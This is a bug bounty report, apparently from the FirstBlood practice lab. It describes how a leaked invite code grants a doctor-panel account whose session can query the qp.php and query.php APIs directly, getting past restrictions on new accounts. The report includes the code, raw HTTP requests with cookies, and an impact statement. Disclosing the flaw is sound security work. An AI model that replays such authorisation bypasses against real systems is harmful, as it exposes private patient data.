BugBountyHunter

Summary

A Reddit post containing the below invite code leaks once redeemed grants access to the Firstblood Management Portal once successfully registered it is posible to use the generated session to query the drapi directly outside of the UI, bypassing the authorisation restrictions for new logins.

Invite code:F16CA47250E445888824A9E63AE445CE

https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/ https://www.reddit.com/user/JollyHack/ Found with a google search of "firstbloodhacker.com"

This grants limit access to the panel and displays. Warning: As your account has been recently registered you will not be able to view patient information yet.

It is however possible to query the qp.php and query.php end points with the session using a proxy tool

Request

POST /drpanel/drapi/qp.php HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 5 Origin: http://firstbloodhackers.com:49227 DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/cancelled.php Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554

name=

It is also posible to query the appointments api with the same session

Request

GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/index.php Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554

Impact

Full api access to the appointment query and patient API bypassing of UI restrictions.